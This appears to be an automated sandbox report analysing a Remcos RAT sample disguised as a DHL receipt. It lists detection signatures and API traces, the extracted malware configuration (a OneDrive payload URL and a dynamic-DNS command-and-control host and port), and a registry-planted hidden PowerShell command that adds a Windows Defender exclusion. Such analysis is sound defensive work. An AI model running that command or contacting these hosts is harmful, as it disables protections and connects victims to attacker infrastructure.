Windows Analysis Report
DHL119040 receipt document,pdf.exe

Overview

General Information

Sample name: DHL119040 receipt document,pdf.exe
Analysis ID: 1471440
MD5: 0db7fbc1b1d0af0a9503401691f95e30
SHA1: e93bb010d9df4bb5df8203429d228d4748976747
SHA256: f2df2225b522198984f1c38654f2d06f2855a0efc8c57d87f566ea21e5c68cab
Tags: exeRATRemcosRAT
Infos:

Detection

Remcos, DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: TrustedPath UAC Bypass Pattern
Snort IDS alert for network traffic
UAC bypass detected (Fodhelper)
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates autostart registry keys with suspicious names
Creates multiple autostart registry keys
Delayed program exit found
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executables to the windows directory (C:\Windows) and starts them
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Maps a DLL or memory area into another process
Opens network shares
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Reg Add Open Command
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
 https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Name Description Attribution Blogpost URLs Link
DBatLoader This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

AV Detection
barindex
Found malware configuration
Source: DHL119040 receipt document,pdf.exe Malware Configuration Extractor: DBatLoader {"Download Url": ["https://onedrive.live.com/download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8"]}
Source: 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "jantasagasa.duckdns.org:44577:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0X3XK5", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Multi AV Scanner detection for submitted file
Source: DHL119040 receipt document,pdf.exe Virustotal: Detection: 18% Perma Link
Yara detected Remcos RAT
Source: Yara match File source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.2020797857.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.1940219819.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: remcos.exe PID: 7596, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: remcos.exe PID: 8132, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: remcos.exe PID: 3844, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\trhrth\logs.dat, type: DROPPED
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA73837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 0_2_2DA73837
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5A48C8 CryptUnprotectData,connect,CreateEventW,CreateEventW,WSAGetLastError, 5_2_2D5A48C8
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5A6A63 LoadLibraryA,GetProcAddress,CryptUnprotectData, 5_2_2D5A6A63
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5B14F5 SetEvent,CryptUnprotectData,inet_ntoa, 5_2_2D5B14F5
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5D3837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 5_2_2D5D3837
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData, 20_2_00404423
Source: DHL119040 receipt document,pdf.exe Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits
barindex
Yara detected UAC Bypass using CMSTP
Source: Yara match File source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR

Privilege Escalation
barindex
Contains functionality to bypass UAC (CMSTPLUA)
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA474FD _wcslen,CoGetObject, 0_2_2DA474FD
UAC bypass detected (Fodhelper)
Source: C:\Users\Public\ger.exe Registry value created: NULL C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"
Uses 32bit PE files
Source: DHL119040 receipt document,pdf.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: FodHelper.pdb source: extrac32.exe, 0000000E.00000002.1763595551.000001B076CE0000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000018.00000000.1833101121.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe, 00000018.00000002.1840596880.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe.14.dr
Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000007.00000002.1735401572.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000007.00000000.1734234471.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000002.1741873077.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000000.1735973999.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000000.1743797680.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000002.1750531723.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000000.1750914185.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000002.1758990941.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000002.1764352289.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000000.1759822129.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000000.1764756849.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000002.1832421872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000000.1794890355.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000002.1798993519.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000002.1849408594.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000000.1843787747.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000000.1850048548.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000002.1861809511.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000022.00000000.1862257217.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000022.00000002.1863811954.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000002.1865641377.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000000.1864540039.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000002.1867019902.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000000.1866079872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000002.1868535173.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000000.1867521283.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000000.1870059327.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000002.1871322746.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000002.1872553278.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000000.1871755612.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe,
Source: Binary string: powershell.pdbUGP source: xkn.exe, 00000010.00000000.1765237716.00007FF7F65BA000.00000002.00000001.01000000.0000000A.sdmp, xkn.exe.12.dr
Source: Binary string: easinvoker.pdbH source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: reg.pdb source: extrac32.exe, 0000000A.00000002.1749786988.000001CBEB360000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000013.00000000.1795528997.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe, 00000013.00000002.1796884193.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe.10.dr
Source: Binary string: powershell.pdb source: xkn.exe, 00000010.00000000.1765237716.00007FF7F65BA000.00000002.00000001.01000000.0000000A.sdmp, xkn.exe.12.dr
Source: Binary string: cmd.pdb source: alpha.exe, 00000007.00000002.1735401572.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000007.00000000.1734234471.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000002.1741873077.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000000.1735973999.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000000.1743797680.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000002.1750531723.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000000.1750914185.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000002.1758990941.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000002.1764352289.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000000.1759822129.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000000.1764756849.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000002.1832421872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000000.1794890355.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000002.1798993519.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000002.1849408594.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000000.1843787747.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000000.1850048548.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000002.1861809511.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000022.00000000.1862257217.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000022.00000002.1863811954.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000002.1865641377.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000000.1864540039.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000002.1867019902.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000000.1866079872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000002.1868535173.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000000.1867521283.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000000.1870059327.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000002.1871322746.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000002.1872553278.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000000.1871755612.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 000
Source: Binary string: FodHelper.pdbGCTL source: extrac32.exe, 0000000E.00000002.1763595551.000001B076CE0000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000018.00000000.1833101121.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe, 00000018.00000002.1840596880.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe.14.dr
Source: Binary string: reg.pdbGCTL source: extrac32.exe, 0000000A.00000002.1749786988.000001CBEB360000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000013.00000000.1795528997.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe, 00000013.00000002.1796884193.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe.10.dr
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028A58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_028A58B4
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 0_2_2DA4BD37
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4783C FindFirstFileW,FindNextFileW, 0_2_2DA4783C
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 0_2_2DA4880C
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 0_2_2DA4BB30
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA59AF5 FindFirstFileW,FindNextFileW,FindNextFileW, 0_2_2DA59AF5
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA49665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 0_2_2DA49665
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 0_2_2DA4C34D
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA5C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 0_2_2DA5C291
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA49253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 0_2_2DA49253
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_45BC10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 5_2_45BC10F1
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5AC34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 5_2_2D5AC34D
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5ABD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 5_2_2D5ABD37
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5A9665 FindFirstFileW,FindNextFileW,FindClose,FindClose, 5_2_2D5A9665
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5A880C FindFirstFileW,FindNextFileW,FindClose, 5_2_2D5A880C
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5A783C FindFirstFileW,FindNextFileW, 5_2_2D5A783C
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5ABB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 5_2_2D5ABB30
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5B9AF5 FindFirstFileW, 5_2_2D5B9AF5
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5BC291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 5_2_2D5BC291
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 7_2_00007FF7689C2978
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 7_2_00007FF7689B35B8
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 7_2_00007FF7689B1560
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 7_2_00007FF7689C823C
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689D7B4C FindFirstFileW,FindNextFileW,FindClose, 7_2_00007FF7689D7B4C
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 8_2_00007FF7689C2978
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 8_2_00007FF7689B35B8
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 8_2_00007FF7689B1560
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 8_2_00007FF7689C823C
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689D7B4C FindFirstFileW,FindNextFileW,FindClose, 8_2_00007FF7689D7B4C
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 11_2_00007FF7689C2978
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 11_2_00007FF7689C823C
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 11_2_00007FF7689B35B8
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 11_2_00007FF7689B1560
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689D7B4C FindFirstFileW,FindNextFileW,FindClose, 11_2_00007FF7689D7B4C
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0040AE51 FindFirstFileW,FindNextFileW, 20_2_0040AE51
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA47C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 0_2_2DA47C97
Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\AppData\Local\Temp\971D.tmp Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.tmp Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\ Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
